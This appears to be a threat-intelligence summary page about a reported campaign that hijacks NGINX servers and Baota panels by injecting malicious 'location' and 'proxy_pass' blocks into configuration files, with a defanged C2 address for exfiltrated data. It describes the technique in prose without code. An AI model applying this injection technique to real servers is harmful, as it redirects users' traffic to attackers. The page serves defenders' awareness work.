NGINX Server Traffic Hijacking Campaign

Timeline

1. 05.02.2026 01:26 1 articles · 23h ago

   Threat Actor Compromises NGINX Servers to Hijack User Traffic

   A threat actor is compromising NGINX servers to hijack and redirect user traffic through attacker-controlled infrastructure. The campaign targets NGINX installations and Baota hosting management panels, particularly affecting sites with Asian top-level domains and government/educational sites. The attackers modify NGINX configuration files to inject malicious 'location' blocks, rerouting traffic via the 'proxy_pass' directive to attacker-controlled domains. The attack uses a multi-stage toolkit to perform these injections, making the traffic appear legitimate by preserving request headers. The final stage of the toolkit scans compromised NGINX configurations to build a map of hijacked domains, injection templates, and proxy targets, exfiltrating the data to a command-and-control (C2) server at 158.94.210[.]227. The campaign is difficult to detect as it does not exploit an NGINX vulnerability but instead hides malicious instructions in configuration files, which are rarely scrutinized.

   Show sources

   • Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26

   Open in new tab

Information Snippets

• NGINX is open-source software used for web traffic management, including web serving, load balancing, caching, and reverse proxying.

  First reported: 05.02.2026 01:26
  1 source, 1 article
  Show sources

  • Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26

• The campaign targets NGINX installations and Baota hosting management panels, affecting sites with Asian top-level domains (.in, .id, .pe, .bd, .th) and government/educational sites (.edu, .gov).

  First reported: 05.02.2026 01:26
  1 source, 1 article
  Show sources

  • Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26

• Attackers inject malicious 'location' blocks into NGINX configuration files to capture and reroute incoming requests to attacker-controlled domains using the 'proxy_pass' directive.

  First reported: 05.02.2026 01:26
  1 source, 1 article
  Show sources

  • Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26

• The attack uses a scripted multi-stage toolkit to perform the NGINX configuration injections, operating in five stages to ensure the injections are performed safely and without service downtime.

  First reported: 05.02.2026 01:26
  1 source, 1 article
  Show sources

  • Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26

• The toolkit preserves request headers such as 'Host,' 'X-Real-IP,' 'User-Agent,' and 'Referer' to make the traffic appear legitimate.

  First reported: 05.02.2026 01:26
  1 source, 1 article
  Show sources

  • Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26

• The final stage of the toolkit scans compromised NGINX configurations to build a map of hijacked domains, injection templates, and proxy targets, exfiltrating the data to a command-and-control (C2) server at 158.94.210[.]227.

  First reported: 05.02.2026 01:26
  1 source, 1 article
  Show sources

  • Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26

• The campaign is difficult to detect as it does not exploit an NGINX vulnerability but instead hides malicious instructions in configuration files.

  First reported: 05.02.2026 01:26
  1 source, 1 article
  Show sources

  • Hackers compromise NGINX servers to redirect user traffic — www.bleepingcomputer.com — 05.02.2026 01:26